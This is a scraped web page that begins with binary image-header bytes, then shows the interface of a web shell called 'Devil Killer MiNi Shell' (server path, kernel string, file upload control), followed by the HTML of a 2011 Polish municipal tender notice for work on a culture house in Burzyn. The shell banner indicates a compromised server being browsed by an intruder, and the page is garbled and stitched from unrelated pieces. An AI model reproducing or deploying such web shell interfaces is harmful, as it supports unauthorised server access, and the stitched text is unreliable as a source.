JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110303/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110303/34728-N-2011.html

<p class="kh_header"><b>Tuchów: Modernizacja  Domu  Kultury  w  Burzynie  wraz  z  otoczeniem ETAP  II</b><br>
<b>Numer ogłoszenia: 34728 - 2011; data zamieszczenia: 03.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja  Domu  Kultury  w  Burzynie  wraz  z  otoczeniem ETAP  II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest projekt pn. Modernizacja Domu  Kultury w  Burzynie  wraz  z  otoczeniem  ETAP  II obejmujący   modernizację otoczenia wokół wyremontowanego budynku Domu  Ludowego  /Dom  Kultury/  w  Burzynie  na  działce  nr  260/2, oraz budowa chodnika przy drodze powiatowej  i  gminnej nr 82, 259, 268, 269  w Burzynie  w  ramach  działania  /Odnowa  i  rozwój  wsi  objętego  PROW na  lata  2007 - 2013/

W ramach przedmiotu zamówienia należy wykonać:
a/ Roboty w zakresie nawierzchni
roboty w zakresie przygotowania terenu i roboty ziemne - roboty rozbiórkowe
usuwanie powłoki gleby - roboty ziemne
roboty w zakresie nawierzchni dróg - roboty drogowe

b/ Budowa chodnika wraz z kanalizacją deszczową w Burzynie
roboty rozbiórkowe
roboty przygotowawcze - roboty ziemne
kanały odwadniające
roboty drogowe

Opis przedmiotu zamówienia określa załączona do niniejszej SIWZ kompletna  dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych, oraz szczegółowe przedmiary  robót.
Zakres  robót  podlegający  trybowi  przetargowemu  musi  być  wykonany  w sposób  zgodny  z  powszechnie  obowiązującymi  warunkami  technicznymi  wykonania i  odbioru  robót  budowlanych, dla  tego  typu  robót,                 łącznie z  robotami  towarzyszącymi, oraz  na warunkach określonych  we wzorze umowy. 
Szczegółowy  zakres  robót  określa  przedmiar  robót  i  specyfikacja  techniczna  wykonania  i  odbioru  robót  budowlanych,   które  to  dokumenty  są   załącznikiem  do  specyfikacji  istotnych  warunków  zamówienia
Wykonawca robót budowlanych  przy składaniu i wycenie ofert musi  uwzględnić  specyfikację  techniczną  wykonania i  odbioru  robót  budowlanych.
Przy  doborze  materiałów  należy  kierować  się  wymaganiami  sprecyzowanymi  w  dokumentacji, oraz  specyfikacji  technicznej  wykonania  i  odbioru  robót. Zaproponowane  materiały  nie  mogą  być  gorszej jakości  niż  w  dokumentacji  technicznej.
Odstępstwo od tych wymagań jest możliwe tylko po uzyskaniu zgody, Inwestora, projektanta i inspektora nadzoru inwestorskiego.
Do  wykonania  robót  należy  użyć  wyłącznie  materiałów  posiadających  wymagane  atesty  i  certyfikaty, które  będą  wymagane  przy  odbiorze  końcowym  robót.
Wykonawca zapewni  materiały  i  urządzenia niezbędne  do  wykonania  przedmiotu  umowy, posiadające  aktualne  atesty, certyfikaty  dopuszczające  ich  do  stosowania  oraz  gwarancje  na  wszystkie  zamontowane  urządzenia. Transport  materiałów  na  plac  budowy  (miejsce  wbudowania), oraz  dostarczenie  i  eksploatacja  maszyn  i  urządzeń  niezbędnych  do  prawidłowego  wykonania  obciążają  wykonawcę  robót.
W  uzasadnionych  ekonomicznie i  technologicznie  przypadkach  wyłącznie  za  zgodą  Zamawiającego                - na  etapie  realizacji  zamówienia - w  przypadku  ukazania  się  na  rynku materiałów nowocześniejszych, o  lepszych  właściwościach  i  parametrach, zamawiający  dopuszcza możliwość  ich  zastosowania  w  zamian  za  materiały  zaproponowane  w  ofercie  i  w  projekcie  technicznym.
Jednak  zmiana  ta  nie  może  wpływać  na  zwiększenie  ceny  realizacji  zamówienia  przyjętej  przez  zamawiającego                  w  wyniku  rozstrzygnięcia   przetargu.
Wykonawca  zobowiązany  jest  do  zapewnienia  we  własnym  zakresie  wywozu  i  utylizacji  odpadów (śmieci, gruzu, itp.) zgodnie  z  przepisami  ustawy  o  odpadach, oraz  udokumentowania  tych  czynności  na  każdorazowe  żądanie  Zamawiającego.
Wykonawca  zobowiązany jest do sprzedaży złomu pochodzącego z rozbiórki lub wymiany innych elementów  konstrukcyjnych, a uzyskane pieniądze przekazać na konto Zamawiającego.
Niniejszy  projekt  realizowany  jest  w  oparciu  umowę  o  przyznanie  pomocy  nr  00117-6922-UM0600080/09  w  ramach  działania  Odnowa  i  rozwój  wsi  objętego  PROW  na  lata  2007 - 2013.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.22.00-7, 45.23.32.20-7, 45.23.31.45-2, 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zasady wnoszenia wadium

Wadium w wysokości  5 000,00 zł powinno być wniesione w terminie do  dnia  21.03.2011 r. do  godz. 10.00 Nie  wniesienie wadium w wymaganym terminie spowoduje odrzucenie oferty, zgodnie z Prawem zamówień publicznych.
Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na rachunek zamawiającego w banku:
Bank  Spółdzielczy  w  Bieczu  - Filia  Tuchów  Nr  75  8627  0001  2023  9000  2645  0004  z  adnotacją: Wadium -  nr sprawy:  [ZP-341-5/11].

1a. Wadium może być wniesione w jednej z następujących form:

1.w pieniądzu
2.poręczeniach lub w poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,   z tym  że  zobowiązanie  kasy  jest  zawsze  poręczeniem  pieniężnym
3.gwarancjach bankowych
4.w gwarancjach ubezpieczeniowych
5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust  5 pkt. 2 ustawy z dnia 9 listopada 2000 o  utworzeniu PARP /Dz. U z 2007 r  Nr 42 poz. 275/

Wykonawcy  którzy  zamierzają  wnieść  wadium  w  formie  innej  niż  pieniądz  powinni  złożyć  oryginał  dokumentu  potwierdzający  wniesienie  wadium  w  pokoju   nr  1  przed  terminem  składania  ofert

Wadium  wnieść  można  w każdej  formie  wymienionej  w  pkt. 1.1a, 1 SIWZ z  tym, że  dowód /kopię  potwierdzoną za  zgodność  z  oryginałem/  należy  umieścić  wewnątrz  oferty.
	
2.Zasady zwrotu wadium

Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4, wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez  Wykonawcę.

Zgodnie z art. 46 ustawy  Zamawiający  zwraca  wadium:

1. Wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a uPzp.

2. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy,  jeżeli  jego wniesienia żądano.

3. Zgodnie z art. 46 ust. 2 ustawy, wadium zostanie zwrócone niezwłocznie po złożeniu pisemnego wniosku przez  wykonawcę który wycofał ofertę przed upływem terminu składania ofert.

3.Utrata wadium

Zgodnie z art. 46 ust. 4a  i  5  ustawy  Prawo zamówień publicznych, wykonawca, którego oferta zostanie wybrana, traci wadium na rzecz Zamawiającego, w przypadku gdy:

1)nie  wniósł wymaganego  zabezpieczenia należytego wykonania umowy
2)odmówił  podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
3)zawarcie umowy w sprawie zamówienia publicznego  stało  się niemożliwe  z przyczyn  leżących po stronie wykonawcy.

Ponadto  zamawiający  zatrzymuje  wadium  wraz  z  odsetkami, jeżeli  wykonawca  w  odpowiedzi  na  wezwanie, o  którym  mowa  w  art. 26  ust. 3, nie  złożył  dokumentów  lub  oświadczeń  potwierdzających  spełnienie  warunków  udziału  w  postępowaniu, o  których  mowa w  art. 25  ust. 1, lub  pełnomocnictw  chyba, że  udowodni , że  wynika  to  z  przyczyn  nie  leżących  po  jego  stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca udokumentuje uprawnienia do występowania w obrocie prawnym.

Ocena  tego warunku będzie dokonana  na  podstawie:

- aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania składania ofert,  a  w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  wymaganej  wiedzy  i  doświadczenia - Zamawiający  wymaga, aby  wykonawca  wykazał  się  co  najmniej   2  robotami   budowlanymi polegającymi  na  budowie nawierzchni  utwardzonych kostką brukową, betonową  /chodników, placów, miejsc postojowych i parkingowych itp./ o  powierzchni 700 m2 i  o  wartości   co  najmniej  200  000  PLN  każdy 

Ocena  tego warunku będzie dokonana  na  podstawie:

- wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - załącznik  nr  3  SIWZ,

Do  każdej  pozycji  wyszczególnionej  w   załączniku  nr  3   SIWZ  należy  załączyć  dokument  potwierdzający  należyte  wykonanie  zamówienia. 
Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie   dysponowania  odpowiednim  potencjałem  technicznym   do  wykonania  zamówienia - Zamawiający  wymaga, aby  wykonawca  dysponował  odpowiednim  potencjałem  technicznym  do  wykonania  niniejszego  zamówienia. 

Zamawiający  nie  wyznacza  szczegółowego  warunku  w  tym  zakresie  i  nie  żąda  dokumentów  wykazujących  spełnienie  przez  wykonawcę  ww  warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie   dysponowania   osobami  zdolnymi   do  wykonania  zamówienia - Zamawiający  wymaga, aby  wykonawca  dysponował:

- kierownikiem  budowy  posiadającym  uprawnienia  budowlane  w  specjalności  drogowej z  min. 10 letnim  doświadczeniem zawodowym  jako  kierownik  budowy  w  tym  doświadczenie  w  zakresie  kierowania budową przynajmniej  jednego  nawierzchni wymienionej w pkt. 18 pkt. B ppkt. a  SIWZ o  powierzchni 700 m2
Przez  minimalne  kwalifikacje  zawodowe  dla  stanowisk, dla  których  wymagane  są  uprawnienia  budowlane  rozumie  się  lata  czynne  zawodowo  od  daty  uzyskania  uprawnień, oraz  lata  przepracowane  na  odpowiednich  stanowiskach  kierowniczych zgodnie  z  ustawą  z  dnia  7  lipca  1994 r. Prawo  budowlane /t.j. Dz. U. z 2010 nr 243 poz. 1623/
- posiadania  lub  dysponowania  odpowiednią  ilością  osób  /pracowników  fizycznych/ zdolnych do  wykonania zamówienia  w  ilości  nie mniejszej  niż  5

Ocena tego warunku będzie dokonana w oparciu o:

- oświadczenie  wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik  nr  4  SIWZ
Wykonawca  może  polegać  na  osobach  zdolnych  do  wykonania  zamówienia  innych  podmiotów, niezależnie od  charakteru  prawnego  łączących  go  z  nimi  stosunków, udowadniając  iż  będzie  dysponował  osobami  zdolnymi  do  wykonania  zamówienia, w  szczególności  przedstawiając  pisemne  zobowiązanie  tych  podmiotów  do  oddania do  dyspozycji  niezbędnych  osób  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.

W  przypadku  nie dysponowania  osobami  zdolnymi  do  wykonania  zamówienia, anie  posiadania  potencjału  technicznego  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca  był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę nie mniejszą  niż  200 000  PLN, oraz  że  znajduje  się  w  dobrej  sytuacji  finansowej  i  ekonomicznej. 

Ocena tego warunku zostanie dokonana  na  podstawie:

- opłaconej polisy, a w przypadku  jej  braku  innego  dokumentu  potwierdzającego, że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia
- oświadczenia, że wykonawca znajduje się w dobrej kondycji finansowej i ekonomicznej, złożonego w dokumencie o nazwie oświadczenie - załącznik nr 2  SIWZ

Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
